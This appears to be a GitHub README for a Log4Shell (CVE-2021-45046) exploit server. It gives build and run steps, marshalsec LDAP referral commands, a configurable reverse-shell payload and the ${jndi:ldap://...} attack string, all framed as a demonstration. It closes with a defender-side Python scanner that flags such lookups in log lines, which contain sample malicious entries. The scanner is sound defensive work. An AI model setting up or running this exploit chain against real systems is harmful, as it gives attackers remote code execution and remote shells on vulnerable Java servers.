lwollan/log4j-exploit-server

Exploit server

As part of a demonstration of how the log4j vulnerability CVE-2021-45046 works, a small web server was needed to provide various payloads/gadgets.

Even if the ExploitServer can serve multiple exploit payloads, marshalsec can only support one per instance, as far as I have gathered. You can however run multiple instances of marshalsec.

Configuring exploits

Note that these were tested on macOS and Java 8. The exploits need to be self-contained and cannot depend on external classes outside what would be available on the attack target virtual machine.

Any configuration of the exploit is done during build. Properties can be changed in the properties section of the pom file.

OpenWebPage

Opens a web page using the macOS 'open' command.

Configuring

Property                        Description      Default value
exploit.openwebpage.targeturl   Target webpage   https://www.google.com

RemoteShell

This was based on the code in https://github.com/kozmer/log4j-shell-poc. Some modifications were done, but the main functionality was taken from the Exploit.java file.

Configuring

Property                   Description                      Default value
exploit.remoteshell.host   Address of reverse shell proxy   localhost
exploit.remoteshell.port   Port of reverse shell proxy      9001

Building

The application is built using Apache Maven.

$> mvn clean install

Running server

From maven

$> mvn exec:exec

As standalone jar file

$> java -jar target/log4j-exploit-server-0.0.1-SNAPSHOT.jar 

Verify that server is running

$> curl http://localhost:8000/OpenWebPage.class --output -

Running marshalsec

Assuming Maven and Java are installed, you can execute the following commands:

git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests

Then you can choose which exploit to serve on the LDAP server:

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8000/#OpenWebPage

or

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8000/#RemoteShell

or even both

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8000/#OpenWebPage 10000
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8000/#RemoteShell 10001

Attack URLs

${jndi:ldap://<marshalsec host>:<marshalsec port>/a}
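
A defender-side check for the lookup string above, as an added example that is not part of this repository: it scans log lines for `${jndi:ldap://...}`, including the percent-encoded form that appears in access logs, and extracts the LDAP host and port so the endpoint can be blocked or hunted for. The function names, sample log lines and addresses are constructed for illustration; treating a lookup without a port as port 389 (the standard LDAP port) is an assumption.

```python
import re
from urllib.parse import unquote

# Matches the lookup form shown above: ${jndi:ldap://<host>:<port>/<path>}
JNDI_LDAP = re.compile(
    r"\$\{jndi:ldap://(?P<host>[^:/}\s]+)(?::(?P<port>\d{1,5}))?(?P<path>/[^}\s]*)?\}",
    re.IGNORECASE,
)


def find_jndi_lookups(line):
    """Return (host, port, path) for each ${jndi:ldap://...} lookup in a log line."""
    # Access logs often store the request percent-encoded, so decode before matching.
    decoded = unquote(line)
    hits = []
    for m in JNDI_LDAP.finditer(decoded):
        # Assumption: no explicit port means the standard LDAP port.
        port = int(m.group("port")) if m.group("port") else 389
        hits.append((m.group("host"), port, m.group("path") or "/"))
    return hits


def scan(lines):
    """Map 1-based line number -> hits, only for lines that contain a lookup."""
    return {n: h for n, line in enumerate(lines, 1) if (h := find_jndi_lookups(line))}


# Constructed sample log lines (documentation addresses, not from a real system).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [12/Dec/2021:10:00:07 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:10000/a}"',
    '192.0.2.44 - - [12/Dec/2021:10:00:09 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F'
    'ldap.example.test%3A10001%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79.1"',
    "2021-12-12 10:00:11 INFO  LoginService - user=alice logged in",
]

if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG).items():
        for host, port, path in hits:
            print(f"line {lineno}: JNDI LDAP lookup -> {host}:{port}{path}")
```

Each hit gives an outbound LDAP destination to check against egress firewall and DNS logs for the same time window.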
